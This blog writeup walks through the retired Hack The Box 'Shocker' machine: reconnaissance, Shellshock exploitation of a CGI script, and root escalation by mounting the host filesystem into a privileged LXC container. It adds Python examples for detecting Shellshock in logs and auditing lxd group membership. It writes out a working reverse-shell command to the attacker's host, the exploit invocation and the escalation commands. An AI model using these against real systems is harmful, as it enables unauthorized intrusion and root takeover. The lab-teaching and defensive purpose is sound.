Hack The Box Shocker Writeup

Published:
September 17, 2024

This is a writeup for the retired Hack The Box Shocker machine.

Solution Summary

The machine is vulnerable to the Shellshock bug exposed through a script in the /cgi-bin/ folder in its Apache HTTP server installation. After gaining access through a reverse shell launched through the Shellshock bug, the user flag can be read out.

The root file system can be mounted by the local user inside an LXC container, since they are in the lxd group. With the root file system exposed, the root flag can be read out.

Solution

To complete the machine, the following steps were performed:

  1. Run Nmap and identify any potential vulnerabilities.
  2. Find exposed script files in /cgi-bin/.
  3. Use the Shellshock vulnerability to launch a reverse shell.
  4. Retrieve the user flag.
  5. Escalate to root privileges by bind-mounting the host's root file system into an LXC container.

Nmap

We run Nmap and try to identify vulnerabilities.

nmap -oX machines/shocker/nmap.xl -sV -sC --script vuln -A 10.10.10.56

Nmap returns the following (abbreviated) results:

Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-17 07:15 JST
Nmap scan report for 10.10.10.56
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| vulners:
|   cpe:/a:apache:http_server:2.4.18:
[...]
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| vulners:
[...]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 349.44 seconds

Findings:

The vulners script lists many CVEs for these versions, but none of them has low attack complexity, so nothing here is an obvious way in.

HTTP Server

Website served at http://10.10.10.56

Could “Shocker” be a pun on the Shellshock bug? To exploit Shellshock, we would need access to a CGI script on the Apache HTTP server that is handled by a vulnerable bash.

We run gobuster on the HTTP server:

gobuster dir --url http://10.10.10.56 \
  --wordlist=SecLists/Discovery/Web-Content/common.txt
gobuster dir --url http://10.10.10.56/cgi-bin/ -t 20 \
  --wordlist=SecLists/Discovery/Web-Content/common.txt -x "cgi,sh,pl,py"

For the second scan, we find an interesting file in the cgi-bin folder:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[...]
/user.sh              (Status: 200) [Size: 118]
[...]

Shellshock

We use Nmap again to evaluate /cgi-bin/user.sh for the Shellshock vulnerability, and try to spawn a reverse shell using the following snippet:

bash -i >& /dev/tcp/10.10.16.2/4444 0>&1 & disown

In a separate window, we listen for incoming connections with nc -lvp 4444 and run the following Nmap command:

nmap --script http-shellshock -p80 10.10.10.56 \
  --script-args uri=/cgi-bin/user.sh,cmd="/bin/bash -i >& /dev/tcp/10.10.16.2/4444 0>&1 & disown"

Nmap shows us the following (abbreviated) result:

Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-17 09:44 JST
Nmap scan report for 10.10.10.56
Host is up (0.10s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-shellshock:
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|
|     Disclosure date: 2014-09-24
|     Exploit results:
[...]
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|       http://seclists.org/oss-sec/2014/q3/685
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds

The reverse shell attaches to our machine:

Connection from 10.10.10.56:43486
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$

Screenshot of reverse shell spawned
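As an added defender-side example (not part of the original writeup or the machine), here is a small Python scanner that flags the Shellshock trigger in Apache combined access-log lines: a Referer or User-Agent value that starts with the function-definition prefix "() {" which Nmap's http-shellshock script injects. The log lines are constructed for the example.

```python
import re
from dataclasses import dataclass

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# CVE-2014-6271 trigger: a header value that begins with an exported bash
# function definition. mod_cgi passes header values to the script through
# the environment, which is why the prefix alone is the thing to look for.
SHELLSHOCK_RE = re.compile(r'^\s*\(\s*\)\s*\{')

@dataclass
class Hit:
    host: str
    request: str
    field: str
    value: str

def is_shellshock(value: str) -> bool:
    """True if a header value carries the Shellshock function-definition prefix."""
    return bool(SHELLSHOCK_RE.match(value))

def scan_combined_log(lines):
    """Return one Hit per (line, header field) where the prefix appears.
    Lines that do not parse as combined format are skipped, not reported."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue
        for field in ("referer", "agent"):
            if is_shellshock(m.group(field)):
                hits.append(Hit(m.group("host"), m.group("request"), field, m.group(field)))
    return hits

# Constructed sample lines (not taken from the machine): a normal request to the
# script found with gobuster, two probes carrying the prefix, and one junk line.
SAMPLE_LOG = [
    '10.10.16.2 - - [17/Sep/2024:09:44:01 +0900] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"',
    '10.10.16.2 - - [17/Sep/2024:09:44:02 +0900] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo; /usr/bin/id"',
    '10.10.16.2 - - [17/Sep/2024:09:44:03 +0900] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() { :; }; /bin/true" "curl/8.4.0"',
    'not a log line at all',
]

if __name__ == "__main__":
    for h in scan_combined_log(SAMPLE_LOG):
        print(f"{h.host} {h.request!r}: Shellshock prefix in {h.field}: {h.value!r}")
```

Run it against a real access.log with `scan_combined_log(open("/var/log/apache2/access.log"))`; hits against anything under /cgi-bin/ on an unpatched bash are the event to alert on.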

We run the enumerate script from Valentine and store the results in machines/shocker/enumerate.log:

# Adjust it so that it is piped into bash instead
echo '
set -o pipefail
# sed script: print a line of "=" as long as the header, the header itself, then another line of "="
sedscript="1h;1s/./=/gp;x;1p;x;1p"
# Run one command with stdout and stderr merged, framed by BEGIN/END (or FAIL if it exits non-zero)
function run ()
{
        echo "BEGIN $1" | sed -n "$sedscript"
        if $1 |& cat; then
                echo "END $1" | sed -n "$sedscript"
        else
                echo "FAIL $1" | sed -n "$sedscript"
        fi
}
# $1 is expanded unquoted above on purpose so that each command string is word-split into its arguments
commands=("uname -a"
"whoami"
"hostname"
"cat /etc/os-release"
"lspci -nn"
"lscpu"
"systemctl status"
"ps aux"
"ip link show"
"ip address show"
"ip route show"
"cat /etc/passwd"
"cat /etc/group"
"iptables --list"
"ss -tl")
for command in "${commands[@]}"; do
        run "$command"
done
' | bash

Here are some highlights from the enumeration log:

=========================
BEGIN cat /etc/os-release
=========================
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
[...]

It looks like our current user shelly might be able to spawn containers with LXC:

====================
BEGIN cat /etc/group
====================
[...]
lxd:x:110:shelly
[...]

User flag

First though, we get the user flag:

shelly@Shocker:/usr/lib/cgi-bin$ cd /home/shelly
cd /home/shelly
shelly@Shocker:/home/shelly$ ls
ls
user.txt
shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

LXC

We launch an LXC container and bind-mount the host's root file system into it.

Since the target machine cannot reach the internet directly, we have to host the container image ourselves and serve it with a Python HTTP server.

First, we download the latest Alpine Linux image files from https://images.lxd.canonical.com:

wget  --directory-prefix=machines/shocker/alpine \
  https://images.lxd.canonical.com/images/alpine/3.20/amd64/default/20240917_0017/{lxd.tar.xz,rootfs.squashfs}

We start an HTTP server serving the newly created machines/shocker/alpine folder, remembering to open TCP port 8080 on our machine:

python -m http.server \
  --directory machines/shocker/alpine \
  --bind 10.10.16.2 8080

Back in the reverse shell on the target, we download the two files into the current directory:

curl -O http://10.10.16.2:8080/lxd.tar.xz \
    -O http://10.10.16.2:8080/rootfs.squashfs

We then import the images into LXD:

lxc image import $PWD/{lxd.tar.xz,rootfs.squashfs}

The image import completes successfully and we see the following message:

Image imported with fingerprint:
ccaeb52f5433c84653bbfcf2229ea1bd34c6b66afd75a2d3b4e545ec7b60cac6

We create a privileged container from the imported image using the fingerprint above, attach the host's root file system at /mnt/root, start it and spawn a shell:

lxc init ccaeb52f5433c84653bbfcf2229ea1bd34c6b66afd75a2d3b4e545ec7b60cac6 \
    pwnage --config security.privileged=true
lxc config device add pwnage host-root disk \
    source=/ path=/mnt/root recursive=true
lxc start pwnage
# /bin/bash not available
lxc exec pwnage /bin/sh

Inside the container's root shell, we run:

ls /mnt/root/root
root.txt
cat /mnt/root/root/root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And we have the flag.
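This escalation works only because shelly is a member of the lxd group. As an added audit example (not from the writeup), this Python check lists non-root accounts that belong to container-management groups (lxd, and docker as the equivalent case, an assumption of the general check), counting both supplementary membership in /etc/group and a primary GID in /etc/passwd; the sample files are constructed around the lxd line seen in the enumeration log.

```python
# Groups whose members can reach root through container tooling: lxd is the
# case on this machine; docker is included as an assumption for the general check.
CONTAINER_GROUPS = {"lxd", "docker"}

def parse_colon_file(text):
    """Split /etc/passwd or /etc/group style text into lists of fields."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            rows.append(line.split(":"))
    return rows

def container_capable_users(passwd_text, group_text, groups=CONTAINER_GROUPS):
    """Map each non-root user to the container groups that grant them access.

    Counts both supplementary membership (the member list in /etc/group)
    and primary membership (a user's GID field in /etc/passwd); the second
    is what a plain 'grep lxd /etc/group' misses."""
    gid_to_name = {}
    findings = {}
    for fields in parse_colon_file(group_text):
        if len(fields) < 4:
            continue  # malformed entry
        name, gid, members = fields[0], fields[2], fields[3]
        gid_to_name[gid] = name
        if name in groups:
            for user in filter(None, members.split(",")):
                findings.setdefault(user, set()).add(name)
    for fields in parse_colon_file(passwd_text):
        if len(fields) < 4:
            continue
        user, primary_gid = fields[0], fields[3]
        gname = gid_to_name.get(primary_gid)
        if gname in groups:
            findings.setdefault(user, set()).add(gname)
    findings.pop("root", None)  # root gains nothing from these groups
    return findings

# Constructed sample files mirroring the lxd line from the enumeration log.
SAMPLE_GROUP = """root:x:0:
sudo:x:27:
lxd:x:110:shelly
docker:x:999:
"""
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
shelly:x:1000:1000:,,,:/home/shelly:/bin/bash
svc:x:1001:999::/var/lib/svc:/usr/sbin/nologin
"""

if __name__ == "__main__":
    for user, gs in sorted(container_capable_users(SAMPLE_PASSWD, SAMPLE_GROUP).items()):
        print(f"{user}: member of {', '.join(sorted(gs))}")
```

On a real host, pass the contents of /etc/passwd and /etc/group; any user reported here should be treated as root-equivalent until removed from the group.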

I would be thrilled to hear from you! Please share your thoughts and ideas with me via email.
